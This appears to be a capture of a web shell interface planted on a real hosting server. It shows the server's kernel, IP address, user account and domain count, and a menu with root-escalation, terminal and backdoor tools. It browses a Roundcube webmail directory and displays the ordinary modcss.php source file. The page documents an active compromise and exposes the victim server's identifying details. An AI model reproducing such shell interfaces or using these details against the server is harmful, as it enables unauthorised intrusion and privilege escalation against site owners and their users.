Linux sagir-us1.hostever.us 5.14.0-570.51.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Oct 8 09:41:34 EDT 2025 x86_64
LiteSpeed
Server IP : 104.247.108.91 & Your IP : 216.73.216.26
Domains : 74 Domain
User : georgeto
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
webuzo-data /
roundcube /
program /
actions /
utils /
Delete
Unzip
Name
Size
Permission
Date
Action
error.php
6.14
KB
-rw-r--r--
2026-02-08 09:33
html2text.php
1.73
KB
-rw-r--r--
2026-02-08 09:33
killcache.php
2.51
KB
-rw-r--r--
2026-02-08 09:33
modcss.php
3.06
KB
-rw-r--r--
2026-02-08 09:33
save_pref.php
3.28
KB
-rw-r--r--
2026-02-08 09:33
spell.php
2.95
KB
-rw-r--r--
2026-02-08 09:33
spell_html.php
2.83
KB
-rw-r--r--
2026-02-08 09:33
text2html.php
1.6
KB
-rw-r--r--
2026-02-08 09:33
Save
Rename
<?php /** +-----------------------------------------------------------------------+ | This file is part of the Roundcube Webmail client | | | | Copyright (C) The Roundcube Dev Team | | | | Licensed under the GNU General Public License version 3 or | | any later version with exceptions for skins & plugins. | | See the README file for a full license statement. | | | | PURPOSE: | | Modify CSS source from a URL | +-----------------------------------------------------------------------+ | Author: Thomas Bruederli <roundcube@gmail.com> | | Author: Aleksander Machniak <alec@alec.pl> | +-----------------------------------------------------------------------+ */ class rcmail_action_utils_modcss extends rcmail_action { /** * Request handler. * * @param array $args Arguments from the previous step(s) */ public function run($args = []) { $rcmail = rcmail::get_instance(); $url = rcube_utils::get_input_string('_u', rcube_utils::INPUT_GET); $url = preg_replace('![^a-z0-9.-]!i', '', $url); if ($url === null || empty($_SESSION['modcssurls'][$url])) { $rcmail->output->sendExitError(403, "Unauthorized request"); } $realurl = $_SESSION['modcssurls'][$url]; // don't allow any other connections than http(s) if (!preg_match('~^https?://~i', $realurl, $matches)) { $rcmail->output->sendExitError(403, "Invalid URL"); } $source = false; $ctype = null; try { $client = rcube::get_instance()->get_http_client(); $response = $client->get($realurl); if (!empty($response)) { $ctype = $response->getHeader('Content-Type'); $ctype = !empty($ctype) ? $ctype[0] : ''; $source = $response->getBody(); } } catch (Exception $e) { rcube::raise_error($e, true, false); } $cid = rcube_utils::get_input_string('_c', rcube_utils::INPUT_GET); $prefix = rcube_utils::get_input_string('_p', rcube_utils::INPUT_GET); $container_id = preg_replace('/[^a-z0-9]/i', '', $cid); $css_prefix = preg_replace('/[^a-z0-9]/i', '', $prefix); $ctype_regexp = '~^text/(css|plain)~i'; if ($source !== false && $ctype && preg_match($ctype_regexp, $ctype)) { $rcmail->output->sendExit( rcube_utils::mod_css_styles($source, $container_id, false, $css_prefix), ['Content-Type: text/css'] ); } $rcmail->output->sendExitError(404, "Invalid response returned by server"); } }